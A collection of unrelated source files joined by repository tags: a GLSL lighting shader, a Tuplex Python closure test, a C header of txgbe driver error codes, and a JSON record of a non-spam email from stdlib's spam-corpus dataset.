	vec3 normal = normalize(gl_TexCoord[2].xyz);
	vec3 t0 = gl_TexCoord[3].xyz;
	vec3 t1 = gl_TexCoord[4].xyz;
	vec3 diffuseMat;
	vec3 specularMat;
	vec3 bump;
	vec3 emissiveReflectSpecPow;

	// read in material color for diffuse, specular, bump, emmisive
	// 3D texture
	diffuseMat = myTexture3DCom(gl_TexCoord[0].xyz, gl_TexCoord[6].w);
	//diffuseMat = myTexture3D(gl_TexCoord[0].xyz);//texture3D(ttt3D, gl_TexCoord[0].xyz);
	//diffuseMat = texture3D(ttt3D, gl_TexCoord[0].xyz);
	specularMat = vec3(1.0);
	bump = texture2D(texture, gl_TexCoord[5].xy).xyz;
	// Near-black bump texel means "no bump map bound"; use a flat normal.
	if (dot(bump,bump) < 0.01) bump = vec3(0.5,0.5,1);
	emissiveReflectSpecPow = vec3(0.0,0.0,0.0);

	// apply bump to the normal
	bump = (bump - vec3(0.5,0.5,0.5)) * 2.0f;
	bump.xy *= roughnessScale*0.1;
	float sc = 1.0f;
	normal = normalize(t0*bump.x + t1*bump.y + sc*normal * bump.z);
	//gl_FragColor.xyz = normal*0.5 + vec3(0.5,0.5,0.5);
	//gl_FragColor.w = 1;
	//return;

	vec3 eyeVec = normalize(gl_TexCoord[1].xyz);

	// apply gamma correction for diffuse textures
	//diffuseMat = pow(diffuseMat, 0.45);

	float specularPower = emissiveReflectSpecPow.b*255.0f + 1.0f;
	// TODO - fix this
	specularPower = 10.0f;
	float emissive = 0.0f;
	float reflectivity = emissiveReflectSpecPow.b;
	float fresnel = fresnelBias + fresnelScale*pow(1.0 - max(0.0, dot(normal, eyeVec)), fresnelPower);
	float specular = 0.0f;

	vec3 skyNormal = reflect(eyeVec, normal);
	vec3 skyColor = skyLightIntensity * textureCube(skyboxTex, skyNormal).rgb;
	vec3 ambientSkyColor = diffuseMat * skyColor;
	vec3 diffuseColor = vec3(0.0, 0.0, 0.0);

	// Primary shadow-casting spot light.
	if (numShadows >= 1)
	{
		vec3 lightColor = hdrScale * vec3(1.0, 1.0, 1.0);
		vec3 shadowColor = vec3(0.4, 0.4, 0.7); // colored shadow
		//vec3 lvec = normalize(spotLightDir);
		vec3 lvec = normalize(spotLightPos - gl_TexCoord[1].xyz);
		float ldn = max(0.0f, dot(normal, lvec));
		float cosine = dot(lvec, spotLightDir);
		float intensity = smoothstep(spotLightCosineDecayBegin, spotLightCosineDecayEnd, cosine);
		float bscale = 1;//1.0f-ldn;
		float shadowC = shadowCoeff1(bscale);
		//gl_FragColor = vec4(shadowC,shadowC,shadowC,1.0f);
		//return;

		vec3 irradiance = shadowC * ldn * lightColor;
		// diffuse irradiance
		diffuseColor += diffuseMat * irradiance*intensity;
		// add colored shadow
		diffuseColor += (1.0 - shadowC*ldn) * shadowAmbient * shadowColor * diffuseMat*intensity;

		vec3 r = reflect(lvec, normal);
		specular += pow(max(0.0, dot(r, eyeVec)), specularPower)*shadowC*intensity;
	}

	// add rim light
	if (numShadows >= 2)
	{
		vec3 lightColor = hdrScale * vec3(1.0, 1.0, 1.0);
		vec3 lvec = normalize(spotLightDir2);
		float ldn = max(0.0f, dot(normal, lvec));
		vec3 irradiance = ldn * lightColor;
		// diffuse irradiance
		diffuseColor += diffuseMat * irradiance;
	}

	vec3 color = vec3(0.0, 0.0, 0.0);
	color += diffuseColor;
	color += ambientSkyColor;
	color += specular*specularMat;
	color += hdrScale * emissive * diffuseMat;

	//vec3 reflectColor = diffuseMat * texture2DRect(reflectionTex, gl_FragCoord.xy).rgb;
	//color = reflectionCoeff * reflectColor + (1.0f - reflectionCoeff) * color;

	// Blend in the Fresnel-weighted sky reflection by surface reflectivity.
	color = (fresnel * skyColor + (1.0 - fresnel) * color) * reflectivity + (1.0 - reflectivity) * color;

	gl_FragColor.rgb = color;
	gl_FragColor.w = gl_Color.w;

	// Depth fog using the fixed-function fog state.
	float fog = clamp(gl_Fog.scale*(gl_Fog.end+gl_TexCoord[1].z), 0.0, 1.0);
	vec4 fogCol = gl_Fog.color;
	gl_FragColor = mix(fogCol, gl_FragColor, fog);
}
778
<reponame>rahulyesantharao/tuplex #!/usr/bin/env python3 #----------------------------------------------------------------------------------------------------------------------# # # # Tuplex: Blazing Fast Python Data Science # # # # # # (c) 2017 - 2021, Tuplex team # # Created by <NAME> first on 1/1/2021 # # License: Apache 2.0 # #----------------------------------------------------------------------------------------------------------------------# from unittest import TestCase import tuplex import time class TestClosure(TestCase): def setUp(self): self.c = tuplex.Context(webui=False) def testGlobalVar(self): # function capturing global g g = 20 def f(x): return x + g res = self.c.parallelize([1, 2, 3]).map(f).collect() self.assertEqual(res, [21, 22, 23]) res = self.c.parallelize([1, 2, 3]).map(lambda x: x * g).collect() self.assertEqual(res, [20, 40, 60])
1,011
956
/* SPDX-License-Identifier: BSD-3-Clause
 * Copyright(c) 2015-2020
 */

#ifndef _TXGBE_STATUS_H_
#define _TXGBE_STATUS_H_

/* Error Codes:
 *	common error
 *	module error(simple)
 *	module error(detailed)
 *
 *	(-256, 256): reserved for non-txgbe defined error code
 */
#define TERR_BASE (0x100)

/* Per-module error identifiers, offset by TERR_BASE so they stay outside the
 * (-256, 256) range reserved for non-txgbe codes. The public return codes
 * below are the negated (TERR_BASE + n) values.
 */
enum txgbe_error {
	TERR_NULL = TERR_BASE,
	TERR_ANY,
	TERR_NOSUPP,
	TERR_NOIMPL,
	TERR_NOMEM,
	TERR_NOSPACE,
	TERR_NOENTRY,
	TERR_CONFIG,
	TERR_ARGS,
	TERR_PARAM,
	TERR_INVALID,
	TERR_TIMEOUT,
	TERR_VERSION,
	TERR_REGISTER,
	TERR_FEATURE,
	TERR_RESET,
	TERR_AUTONEG,
	TERR_MBX,
	TERR_I2C,
	TERR_FC,
	TERR_FLASH,
	TERR_DEVICE,
	TERR_HOSTIF,
	TERR_SRAM,
	TERR_EEPROM,
	TERR_EEPROM_CHECKSUM,
	TERR_EEPROM_PROTECT,
	TERR_EEPROM_VERSION,
	TERR_MAC,
	TERR_MAC_ADDR,
	TERR_SFP,
	TERR_SFP_INITSEQ,
	TERR_SFP_PRESENT,
	TERR_SFP_SUPPORT,
	TERR_SFP_SETUP,
	TERR_PHY,
	TERR_PHY_ADDR,
	TERR_PHY_INIT,
	TERR_FDIR_CMD,
	TERR_FDIR_REINIT,
	TERR_SWFW_SYNC,
	TERR_SWFW_COMMAND,
	TERR_FC_CFG,
	TERR_FC_NEGO,
	TERR_LINK_SETUP,
	TERR_PCIE_PENDING,
	TERR_PBA_SECTION,
	TERR_OVERTEMP,
	TERR_UNDERTEMP,
	TERR_XPCS_POWERUP,
};

/* WARNING: just for legacy compatibility */
#define TXGBE_NOT_IMPLEMENTED 0x7FFFFFFF
#define TXGBE_ERR_OPS_DUMMY   0x3FFFFFFF

/* Error Codes (negative return values; numbering has gaps at 29, 35 and 48,
 * so values must not be renumbered or reused).
 */
#define TXGBE_ERR_EEPROM			-(TERR_BASE + 1)
#define TXGBE_ERR_EEPROM_CHECKSUM		-(TERR_BASE + 2)
#define TXGBE_ERR_PHY				-(TERR_BASE + 3)
#define TXGBE_ERR_CONFIG			-(TERR_BASE + 4)
#define TXGBE_ERR_PARAM				-(TERR_BASE + 5)
#define TXGBE_ERR_MAC_TYPE			-(TERR_BASE + 6)
#define TXGBE_ERR_UNKNOWN_PHY			-(TERR_BASE + 7)
#define TXGBE_ERR_LINK_SETUP			-(TERR_BASE + 8)
#define TXGBE_ERR_ADAPTER_STOPPED		-(TERR_BASE + 9)
#define TXGBE_ERR_INVALID_MAC_ADDR		-(TERR_BASE + 10)
#define TXGBE_ERR_DEVICE_NOT_SUPPORTED		-(TERR_BASE + 11)
#define TXGBE_ERR_MASTER_REQUESTS_PENDING	-(TERR_BASE + 12)
#define TXGBE_ERR_INVALID_LINK_SETTINGS		-(TERR_BASE + 13)
#define TXGBE_ERR_AUTONEG_NOT_COMPLETE		-(TERR_BASE + 14)
#define TXGBE_ERR_RESET_FAILED			-(TERR_BASE + 15)
#define TXGBE_ERR_SWFW_SYNC			-(TERR_BASE + 16)
#define TXGBE_ERR_PHY_ADDR_INVALID		-(TERR_BASE + 17)
#define TXGBE_ERR_I2C				-(TERR_BASE + 18)
#define TXGBE_ERR_SFP_NOT_SUPPORTED		-(TERR_BASE + 19)
#define TXGBE_ERR_SFP_NOT_PRESENT		-(TERR_BASE + 20)
#define TXGBE_ERR_SFP_NO_INIT_SEQ_PRESENT	-(TERR_BASE + 21)
#define TXGBE_ERR_NO_SAN_ADDR_PTR		-(TERR_BASE + 22)
#define TXGBE_ERR_FDIR_REINIT_FAILED		-(TERR_BASE + 23)
#define TXGBE_ERR_EEPROM_VERSION		-(TERR_BASE + 24)
#define TXGBE_ERR_NO_SPACE			-(TERR_BASE + 25)
#define TXGBE_ERR_OVERTEMP			-(TERR_BASE + 26)
#define TXGBE_ERR_FC_NOT_NEGOTIATED		-(TERR_BASE + 27)
#define TXGBE_ERR_FC_NOT_SUPPORTED		-(TERR_BASE + 28)
#define TXGBE_ERR_SFP_SETUP_NOT_COMPLETE	-(TERR_BASE + 30)
#define TXGBE_ERR_PBA_SECTION			-(TERR_BASE + 31)
#define TXGBE_ERR_INVALID_ARGUMENT		-(TERR_BASE + 32)
#define TXGBE_ERR_HOST_INTERFACE_COMMAND	-(TERR_BASE + 33)
#define TXGBE_ERR_OUT_OF_MEM			-(TERR_BASE + 34)
#define TXGBE_ERR_FEATURE_NOT_SUPPORTED		-(TERR_BASE + 36)
#define TXGBE_ERR_EEPROM_PROTECTED_REGION	-(TERR_BASE + 37)
#define TXGBE_ERR_FDIR_CMD_INCOMPLETE		-(TERR_BASE + 38)
#define TXGBE_ERR_FW_RESP_INVALID		-(TERR_BASE + 39)
#define TXGBE_ERR_TOKEN_RETRY			-(TERR_BASE + 40)
#define TXGBE_ERR_FLASH_LOADING_FAILED		-(TERR_BASE + 41)
#define TXGBE_ERR_NOSUPP			-(TERR_BASE + 42)
#define TXGBE_ERR_UNDERTEMP			-(TERR_BASE + 43)
#define TXGBE_ERR_XPCS_POWER_UP_FAILED		-(TERR_BASE + 44)
#define TXGBE_ERR_PHY_INIT_NOT_DONE		-(TERR_BASE + 45)
#define TXGBE_ERR_TIMEOUT			-(TERR_BASE + 46)
#define TXGBE_ERR_REGISTER			-(TERR_BASE + 47)
#define TXGBE_ERR_MNG_ACCESS_FAILED		-(TERR_BASE + 49)

#endif /* _TXGBE_STATUS_H_ */
2,094
3,428
<reponame>ghalimi/stdlib {"id":"01024","group":"easy-ham-2","checksum":{"type":"MD5","value":"28499f419990c33e20cb2f0ea7c77653"},"text":"From <EMAIL> Tue Aug 13 10:31:12 2002\nReturn-Path: <<EMAIL>>\nDelivered-To: y<EMAIL>.netnoteinc.com\nReceived: from localhost (localhost [127.0.0.1])\n\tby phobos.labs.netnoteinc.com (Postfix) with ESMTP id 67131440FA\n\tfor <jm@localhost>; Tue, 13 Aug 2002 05:22:34 -0400 (EDT)\nReceived: from phobos [127.0.0.1]\n\tby localhost with IMAP (fetchmail-5.9.0)\n\tfor jm@localhost (single-drop); Tue, 13 Aug 2002 10:22:34 +0100 (IST)\nReceived: from xent.com ([64.161.22.236]) by dogma.slashnull.org\n (8.11.6/8.11.6) with ESMTP id g7D4xvb18010 for <<EMAIL>>;\n Tue, 13 Aug 2002 05:59:58 +0100\nReceived: from lair.xent.com (localhost [127.0.0.1]) by xent.com (Postfix)\n with ESMTP id 0F4AB2941C3; Mon, 12 Aug 2002 21:58:06 -0700 (PDT)\nDelivered-To: <EMAIL>\nReceived: from nycsmtp3out.rdc-nyc.rr.com (nycsmtp3out.rdc-nyc.rr.com\n [24.29.99.228]) by xent.com (Postfix) with ESMTP id 0E4CE2941C2 for\n <<EMAIL>>; Mon, 12 Aug 2002 21:57:09 -0700 (PDT)\nReceived: from damien (66-108-144-106.nyc.rr.com [66.108.144.106]) by\n nycsmtp3out.rdc-nyc.rr.com (8.12.1/Road Runner SMTP Server 1.0) with ESMTP\n id g7D50Vkl001231; Tue, 13 Aug 2002 01:00:32 -0400 (EDT)\nFrom: \"<NAME>\" <<EMAIL>>\nTo: <<EMAIL>>\nCc: <<EMAIL>>\nSubject: NYTimes.com Article: Bigger Bar Code Inches Up on Retailers\nMessage-Id: <000101c24285$d1c8da40$6a906c42@damien>\nMIME-Version: 1.0\nContent-Type: text/plain; charset=\"us-ascii\"\nContent-Transfer-Encoding: 7bit\nX-Priority: 3 (Normal)\nX-Msmail-Priority: Normal\nX-Mailer: Microsoft Outlook, Build 10.0.3416\nImportance: Normal\nX-Mimeole: Produced By Microsoft MimeOLE V5.50.4807.1700\nSender: [email protected]\nErrors-To: [email protected]\nX-Beenthere: <EMAIL>\nX-Mailman-Version: 2.0.11\nPrecedence: bulk\nList-Help: <mailto:<EMAIL>?subject=help>\nList-Post: <mailto:<EMAIL>>\nList-Subscribe: 
<http://xent.com/mailman/listinfo/fork>, <mailto:<EMAIL>?subject=subscribe>\nList-Id: Friends of <NAME> <fork.xent.com>\nList-Unsubscribe: <http://xent.com/mailman/listinfo/fork>,\n <mailto:<EMAIL>?subject=unsubscribe>\nList-Archive: <http://xent.com/pipermail/fork/>\nDate: Tue, 13 Aug 2002 00:56:43 -0400\n\n\nHow about a highly error corrected atomic level 3D encoding scheme that\nrelies on shape, colour and chemical make up to uniquely identify every\nobject in the universe.\n\nObjects uniquely identify themselves - theres no need for barcodes.\n\n\nhttp://xent.com/mailman/listinfo/fork\n\n\n"}
1,114